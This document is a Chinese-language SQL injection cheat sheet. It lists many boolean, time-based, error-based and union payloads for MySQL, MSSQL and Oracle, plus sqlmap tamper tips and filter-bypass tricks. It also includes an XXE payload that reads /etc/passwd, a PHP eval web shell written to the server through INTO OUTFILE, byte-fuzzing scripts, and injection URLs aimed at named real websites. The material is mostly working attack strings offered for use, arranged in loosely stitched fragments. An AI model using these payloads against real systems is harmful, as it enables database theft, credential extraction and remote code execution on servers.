http :// active . zol . com . cn / 08active / lanmo_campus / list . php ? city = 2 - if ( 1 , 0 , 1 )
基础知识:
MySQL 的 CAST() 和 CONVERT() 函数可用来获取一个类型的值,并产生另一个类型的值。<类型转换>
CAST(value as type); // 值与类型之间用 as 分隔
CONVERT(value,type); // 值与类型之间用逗号分隔
order by xx {sql} :
,if((1=1),1,(select
1 union select 2))
,if((1=2),1,(select 1 union select 2))
工具的话可以用 sqlmap
--suffix ,if((1=1
--prefix
),1,(select 1
union select 2)) --suffix
设置前缀
,if((1=1
//--prefix
设置后缀
),1,(select 1 union select 2))
//--suffix
=======================================================
select xxx( as x)
{sql} from xx :
,case when(1=1)then
1 else (select 1 union select 2) end
,case when(1=2)then 1 else (select 1 union select 2) end
=======================================================
select
* from xxx order by {sql} :
(case when(1=1)
then 1 else (select 1 union select 2) end)
(case when(1=2) then 1 else (select 1 union select 2) end)
or
已存在字段,if((1=1),1,(select 1 union select 2))
已存在字段,if((1=2),1,(select 1 union select 2))
=======================================================
insert
into person (number,name) values (1,'{sql}') :
'+(if((1=1),1,(select
1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'
or
'+(case when(1=1)
then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================
update
xxx set x='{sql}' :
'+(if((1=1),1,(select
1 union select 2)))+'
'+(if((1=2),1,(select 1 union select 2)))+'
or
'+(case when(1=1)
then 1 else (select 1 union select 2) end)+'
=======================================================
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
update xxx set x=x where xx ='{sql}' :
'+(case when(1=1)
then 1 else (select 1 union select 2) end)+'
'+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================
select * from xxx
where x in ('xx','{sql}') :
'+if((1=1),1,(select
1 union select 2))+'
'+if((1=2),1,(select 1 union select 2))+'
rand(true)
rand(FALSE)
1-IF((1=1),1,(SELECT 1 UNION SELECT 2))
1-IF((1=2),1,(SELECT 1 UNION SELECT 2))
DESE,IF((1=1 AND 7053=7053),1,(SELECT 1 UNION SELECT 2)) DESE
DESE,IF((1=1 AND 7053=7054),1,(SELECT 1 UNION SELECT 2)) DESE
{para}'%23
{para}%23
{para} AND 81=81
{para} AND 81=82
{para} AND 1-FALSE
{para} AND 1-TRUE
{para} AND 2-1
{para} AND 2-2
{para} AND 2*3=6
{para} AND 2*3=9
{para} OR 81=81
{para} OR 81=82
{para} AND 1=1X
{para} OR 1=1X
{para} ORDER BY 1-- -
{para} ORDER BY 100-- -
{para} and 1=if((1=1 AND 6607=6607),1,(select 1 union select 2))
{para} and 1=if((1=1 AND 6607=6608),1,(select 1 union select 2))
{para},if((1=1),1,(select 1 from INFORMATION_SCHEMA.SCHEMATA))
{para},if((1=2),1,(select 1 from INFORMATION_SCHEMA.SCHEMATA))
{para}'%2b(if((1=1),1,(select 1 from information_schema.tables)))%2b'
{para}'%2b(if((1=2),1,(select 1 from information_schema.tables)))%2b'
{para},1=if((1=1 AND 5235=5235 ),1,(select 1 union select 2))
{para},1=if((1=2 AND 5235=5235 ),1,(select 1 union select 2))
{para} AND SLEEP(5)
{para} LIMIT 1%23
{para} OR TRUR LIMIT 1%23
{para}' AND SLEEP(5)%23
{para}' AND SLEEP(5) AND 'PYVJ'='PYVJ
{para}'
{para}%df'
{para}''
{para}"
{para}%df"
{para}""
{para}' OR '1
{para}' OR 1-- -
{para}" OR ""="
{para}" OR 1=1-- -
{para}'='
{para}'LIKE'
{para}'=0--+
{para}'or updatexml(1,concat(0x7e,(version())),0) or'
{para}'or extractvalue(1,concat(0x7e,database())) or'
{para} and UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1)
{para}'+ (UpdateXML(1,CONCAT(0x5b,mid( (select database()) ,1,32),0x5d),1)) +'
{para}'||(true and 1=1) limit 2%23
{para}' AND 3928=3928 AND 'gswx'='gswx
{para}' AND 3928=3929 AND 'gswx'='gswx
{para}" and 12=12 and "kn"="kn
{para}' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0X7C,(SELECT (SELECT VERSION()) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),0X7C,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x LIMIT 0,1)a)%23
{para} order by 1,If((1=1),1,(select user from mysql.user))-- -
{para} order by 1,If((1=2),1,(select user from mysql.user))-- -
{para}%' and 1=1 and '%'='
{para}%' and 1=2 and '%'='
{para} 是参数的位置,这样就可以放到burp intruder中进行fuzz了。
注入判断:
or 1=1
or 1=2
and 1=1 数字型
' and '1'='1 字符型
) and (1=1
') and ('1'='1
%' and '%'=' 搜索型
%' and 1=(select 1 from dual) and '%'=' //mysql 和 oracle 中存在 dual 虚拟表
case when 1=1 then 条件 1 else 条件 2 end // 如果条件成立( 1=1 ) 返回条件 1 否则返回条件 2
' and 1=(select case when 1=1 then 1 else 2 end) and '1'='1 //
' and 1=1 and '1'='1
' and 1=2 and '1'='1
' and 1 like 1 and '1' like '1
' and 1 like 2 and '1' like '1
' ||
AND SLEEP(5)
%' and sleep(5) and '%'='
|| = or
&& = and
and 2>1
and 2<1
%0a
' union%a0select version()
bypass.php?id=xxoo'%2b100.union select flag from flag.flag%23
index.php?name= and 1=.1union select flag from flag limit 0,1%23\
%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line
%' an%00d 1=1 an%00d '%'='
宽字节: %df'
and 1 in (1)
and 1 in (2)
绕过技巧:
主要是在利用 substr(user(),1,1) 这类带逗号的语句时会出现问题。
这里有一个小技巧,以上的语句等价于 substr(user() from 1 for 1),绕过了逗号,就可以继续注入了。
substr(user(),1,1) = substr(user() from 1 for
1)
判断当前用户是否具有文件读写权限(file_priv);
union select 1,2, file_priv ,4-- // 看返回的 file_priv 值
example :
http : //i.178.com/~album.photo.view_thread/id/if(1=1%20and%201=1,2737202,2737201)/uid/105652
如果条件成立,则显示 id=2737202 的内容,否则显示 id=2737201 的内容
Sqlmap 使用技巧
--suffix " and '1'='1" // 后缀
--tamper multiplespaces.py --tamper equaltolike.py // multiplespaces.py ( 大空格 tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar') equaltolike.py ( = 变成 like )
--random-agent
判断注入: like
有时候 = 这类比较符可以用 like 语句代替
and 1 like 1
and 1 like 2
盲注:
and length(database())=x
and length(user())=1
'XOR(if(ascii(mid(lower(user()),1,1))=21,sleep(5),0))OR'
?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
and (select(1)from(select(sleep(5)))a)--+
and (select(1)from(select( if(1=1,sleep(5),0) ))a)--+
%27%2b(select(0)from(select(sleep(length(database()))))a)%2b%27
benchmark(5000000,sha(1))
sleep(5) // 与上面的 benchmark() 一样,两者都可以用来制造延时。
SLEEP(25)--
SELECT BENCHMARK(1000000,MD5('A'));
ProductID=1 OR SLEEP(25)=0 LIMIT 1--
ProductID=1) OR SLEEP(25)=0 LIMIT 1--
ProductID=1' OR SLEEP(25)=0 LIMIT 1--
ProductID=1') OR SLEEP(25)=0 LIMIT 1--
ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
ProductID=SELECT SLEEP(25)--
select concat(char(75),char(76),char(77))
char(115,97,109,103,95,97,100,109,105,110,105,115,116,114,97,100,111,114,101,115)--
手工注入:
mysql> select group_concat(table_name) from information_schema.tables where table_schema='yxcms';
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------------------------------------------------+
| group_concat(table_name)
|
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------------------------------------------------+
|
yx_admin,yx_collectrules,yx_extend,yx_extend_conment,yx_extend_guestbook,yx_ex
tend_product,yx_fragment,yx_group,yx_link,yx_member_group,yx_members,yx_method,y
x_news,yx_order_detail,yx_orders,yx_page,yx_photo,yx_place,yx_sort,yx_tags |
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------------------------------------------------+
1 row in set (0.00 sec)
回显注入:
id=1 order by 6 //
判断字段数
id=1 and 1=2 union select 1,2,3,4,5,6 //找出回显位
id=1 and 1=2 union select 1,2,user(),database(),5,6 //简单获取一些系统信息
id=1 and 1=2 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=16进制编码的当前数据库名 //获取表名
id=1 and 1=2 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=16进制编码的表名 //获取字段名
id=1 and 1=2 union select 1,2,group_concat(username,0x3a,password),4,5,6 from 表名 //获取字段内容
附常用敏感函数:user(),database(),@@basedir,@@tmpdir,version(),@@datadir,@@general_log_file,@@hostname,@@plugin_dir,@@port,@@global.version_compile_os
select group_concat(table_name) from information_schema.tables where table_schema=0xxxx // 获取表名,0xxxx 为16进制编码的库名
select group_concat(table_name) from information_schema.tables where table_schema=0x695F3439796F75 // 获取表名
select group_concat(column_name) from information_schema.columns where table_name=0xxxxx // 获取字段名
select group_concat(username,0x3a,password) from 表名
报错注入:
一、floor
mysql> select * from ad where id=1;
+----+---------+------+
| id | sanerwu | zimu |
+----+---------+------+
| 1 | | 1 |
+----+---------+------+
1 row in set (0.00 sec)
mysql> select * from ad where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.5.321' for key 'group_key'
要报出其他内容,只需把 version() 函数换成别的表达式即可,例如:
mysql> select * from ad where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'
二、updatexml
mysql> select * from ad where id=1 and 1=(updatexml(1,concat(0x5e24,(select version() limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$5.5.32^$'
mysql> select * from ad where id=1 and 1=(updatexml(1,concat(0x5e24,(select pass from maixiao limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$21232f297a57a5a743894a0e4a801f'
三、extractvalue
mysql> select * from ad where id = 1 and extractvalue(1, concat(0x5c,(select version())));--
ERROR 1105 (HY000): XPATH syntax error: '\5.5.32'
mysql> select * from ad where id = 1 and extractvalue(1, concat(0x5c,(select user from maixiao limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\21232F297A57A5A743894A0E4A801FC'
四、数据类型
mysql> select 1E308*if(x,2,2) from(select version()x)y;
ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 *
if('5.5.32',2,2))'
mysql> select 1E308*if((select*from(select version())x),2,2);
ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if((select
'5.5.32
' from dual),2,2))'
mysql> select 1E308*if((select*from(select*from maixiao)a limit 1)>(select*from
maixiao limit 1),2,2);
ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if(((select
'1','2
1232F297A57A5A743894A0E4A801FC3','21232f297a57a5a743894a0e4a801fc3','\057E'
五、幂运算
mysql> select * from admin;
+------+--------+
| id | pass |
+------+--------+
| 1 | 123456 |
+------+--------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and
EXP(~(select*from(select user())a));
ERROR 1690 (22003): DOUBLE value is out of range in
'exp(~((select 'root@localhost' from dual)))'
延时注入:
select if(length(user())>4,sleep(5),1) //
判断长度
select if(ascii(mid(user(),1,1))>60,sleep(5),1) //逐位判断ascii码,再转换为字符
select * from users where id ='1' union select if(ascii(mid((select user from
mysql.user limit 1),1,1))>1,sleep(5),1),2,3;
floor 报错
group by concat(version(),floor(rand(0)*2)) having min(0)
and (select 1 from (select count(*),concat( version() ,floor(rand(0)*2))x from information_schema.tables group by x)a);
mysql> select * from ad where id=1;
+----+---------+------+
| id | sanerwu | zimu |
+----+---------+------+
| 1 | | 1 |
+----+---------+------+
1 row in set (0.00 sec)
mysql> select * from ad where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.5.321' for key 'group_key'
and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat(( version() ),floor(rand(0)*2)));
and (select count(*) from (select 1 union select null union select !1)x group by concat(( select table_name from information_schema.tables limit 1 ),floor(rand(0)*2)));
ExtractValue
and extractvalue(1, concat(0x5c, ( select table_name from information_schema.tables limit 1 )))--+
and extractvalue(1, concat(0x5c, ( select @@version )))--+
UpdateXml
and 1=(updatexml(1,concat(0x3a,(select user())),1))
and 1=(updatexml(1,concat(0x3a,( version() )),1)) // and 1=(updatexml(1,concat(0x3a,(select version())),1))
or updatexml(1,concat(0x3a,(select user())),0)#
if(1=1,1,(select 1 from information_schema.tables))
if(1=2,1,(select 1 from information_schema.tables))
http : //www.wooyun.org/whitehats/loopx9
limit 后的注入:
SELECT * FROM test limit 0,1 procedure analyse (extractvalue(rand(),concat(0x3a,(select password from mysql.user limit 0,1))),1)
参考资料:
http : //zone.wooyun.org/content/18220
order by 注入:
实例:通过mid 或者 substr 截取单个字符,然后转换成ascii
currChainID=1534&sortType=c.DAILY_LINE+desc ,if((ascii(substr(database(),1,1))>98),1,(select+1+from+information_schema.tables)) &itemName=&workCode=90000
这一句 if((ascii(substr(database(),1,1))>98),1,(select+1+from+information_schema.tables)) 的理解:如果 ascii 值 > 98 则结果为 1,否则为子查询 select+1+from+information_schema.tables
如果能利用报错注入,通过报错信息可以更快地得到数据库名
currChainID=1534&sortType=c.DAILY_LINE+desc ,if((ascii(substr(database(),1,1))>100),1,(select 1 from information_schematables )) &itemName=&workCode=90000
这里是故意把表名写错(information_schematables),使语句直接报错。
currChainID=1534&sortType=c.DAILY_LINE+desc ,if((ascii(substr(database(),1,1))>100),1,(select 1user())) &itemName=&workCode=90000
写shell :
win <?php eval($_REQUEST[cmd]);?> => 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e
select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'e://appserv//www//91ri.org//modules//wordpress//app.php' ; |
linux
select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile '/var/www/cmd.php';
payloads-sql-blind-MSSQL-INSERT.txt
payloads-sql-blind-MSSQL-WHERE.txt
payloads-sql-blind-MySQL-INSERT.txt
payloads-sql-blind-MySQL-WHERE.txt
payloads-sql-blind-MySQL-ORDER_BY.txt
[mssql]
select db_name(0)
convert(int,system_user)
convert(int,db_name(0)) // 里面的数字可以更改,达到获取所有数据库名
and substring(lower(system_user),1,1)='w'
if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --
'); waitfor delay '0:0:1' --
[mysql]
-1 OR length(user())=23 AND 1=1%20--%20
if(ascii(mid(lower(user()),1,1))=100,benchmark(2000000,md5(1)),0) // 延时
if(ascii(mid(lower(user()),1,1))=100,sleep(5),0)
aaa"XOR(if(now()=sysdate(),sleep(0),0))OR"bb // 延时
aa' xor(if(1=1,sleep(2),0))or 'bb
aa'xor(sleep(1))or'bb
substr(user(),1,1) = substr(user() from 1 for 1)
and 2*3=6 and 2-1=1 // 有时 and 1=1 被拦截,可考虑用这类等价写法
'and(sleep(1))and'1
if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0)
(select(0)from(select(sleep(if(length(user())=21,5,0))))v)
//sign 符号函数
mysql> SELECT SIGN(-32); -> -1
mysql> SELECT SIGN(0); -> 0
mysql> SELECT SIGN(234); -> 1
http : //wooyun.org/bugs/wooyun-2010-086516
sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s))) // 如果产生 sleep(1) 的延时,说明猜测的 ascii 值正确
//sleep(1)
sleep(1=1)
sleep('a'='a')
xxx= admin'='1' or length(user())=x or '1'='1
1' OR 1 GROUP BY CONCAT(0x5e5e,(SELECT user()),0x5e5e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
不带逗号注入:
aa"+EXP(~(select * from (select user())a))+"bb
select group_concat(schema_name) from information_schema.schemata;
[ORACLE]
ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s // 截取字符
http : //wooyun.org/whitehats/lijiejie/type/1/page/10
[XML] 外部实体注入(XXE)
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<message>
<tradeId>ActiveMember</tradeId>
<timestamp>20140915144621</timestamp>
<nPartnerID>1</nPartnerID>
<mebId>998</mebId>
<sActiveCode>KUEe+OyzVKfn8lABdn3itt1OO3zoBtHVkilQgT5WXbUg8lK+EqR+172Rk/RNb/+km2z8sD7nEZD4tR+IsLZkGRJhi9JrUJUart4SliGUbWSlbnhQPEfpLrFEEybAx9RuObcVjcbYkkx6Rl91v4vAwOhlfHENvAwHmwY4X1zR1HA=</sActiveCode>
<eSource>Mobile</eSource>
</message>
Mysql Bypass
可打印 ascii 范围 : 32 - 126
bin 函数:返回 n 的二进制表示字符串
select bin(97) ;
mysql> select bin(97);
+---------+
| bin(97) |
+---------+
| 1100001 |
+---------+
1 row in set (0.00 sec)
>> : 右移,二进制位从右至左编号为 0 1 2 3 4 5 6
mysql> select bin(97);
+---------+
| bin(97) |
+---------+
| 1100001 |
+---------+
1 row in set (0.00 sec)
mysql> select bin(97>>2);
+------------+
| bin(97>>2) |
+------------+
| 11000 |
+------------+
1 row in set (0.00 sec)
mysql> select bin(97>>3);
+------------+
| bin(97>>3) |
+------------+
| 1100 |
+------------+
1 row in set (0.00 sec)
conv 函数: 转换进制
mysql> select bin(111);
+----------+
| bin(111) |
+----------+
| 1101111 |
+----------+
1 row in set (0.00 sec)
mysql> select conv('1101111',2,10);
+----------------------+
| conv('1101111',2,10) |
+----------------------+
| 111 |
+----------------------+
1 row in set (0.00 sec)
mysql> select substr(bin(97>>7),-1,1);
+-------------------------+
| substr(bin(97>>7),-1,1) |
+-------------------------+
| 0 |
+-------------------------+
1 row in set (0.00 sec)
+++++++++++++++++++++++++++++++++++
fuzz:
<?php
// Probe script: for every byte value 0..255, builds a query with that byte
// placed between "1" and "=" in a WHERE clause and records which bytes the
// MySQL parser accepts there (i.e. which bytes act as a token separator).
// The output list below is what a request filter would have to normalize.
// NOTE: the mysql_* extension was removed in PHP 7.0; the hard-coded root
// credentials are only meaningful for a throwaway local instance.
$link = mysql_connect("localhost","root","123456");
// $link is not referenced again; mysql_query() implicitly uses the last opened connection.
for($i=0;$i<=255;$i++){
// Probe query: literal "1", the candidate byte, then "=1".
$sql = "select 1 from dual where 1".chr($i)."=1";
// mysql_query() returns false on a parse error, so a truthy result means the byte was accepted.
$query = mysql_query($sql);
if($query){
// Print decimal, hex and raw byte along with the accepted query (HTML output).
echo $i.":0x".dechex($i).":".chr($i)." ->".$sql."<br>";
}
}
%09 ->select 1 from dual where 1 =1
%0a ->select 1 from dual where 1 =1
%0b
->select 1 from dual where 1
=1
%0c ->select 1 from dual where 1 =1
%0d ->select 1 from dual where 1 =1
%a0 ->select 1 from dual where 1?=1
%20 ->select 1 from dual where 1 =1
0x2e:. ->select 1 from dual where 1.=1
<?php
// Second probe: same idea as the previous script, but the candidate byte is
// placed between the keyword "from" and the table name "user" to find which
// bytes can stand in for whitespace between a keyword and an identifier.
// NOTE: the mysql_* extension was removed in PHP 7.0; the hard-coded root
// credentials are only meaningful for a throwaway local instance.
$link = mysql_connect("localhost","root","123456");
// Selects the built-in "mysql" database so that the "user" table exists for the probe.
mysql_select_db("mysql");
for($i=0;$i<=255;$i++){
// Probe query: "from", the candidate byte, then "user where 1=1".
$sql = "select 1 from".chr($i)."user where 1=1";
// A truthy result means the parser accepted the byte as a separator.
$query = mysql_query($sql);
if($query){
// Print decimal, hex and raw byte along with the accepted query (HTML output).
echo $i.":0x".dechex($i).":".chr($i)." ->".$sql."<br>";
}
}
0x9: ->select 1
from user where 1=1
0xa: ->select 1 from user where 1=1
0xb:
->select 1 from
user where 1=1
0xc: ->select 1 from user where 1=1
0xd: ->select 1 from user where 1=1
0x20: ->select 1 from user where 1=1
0xa0:? ->select 1 from
爑ser where 1=1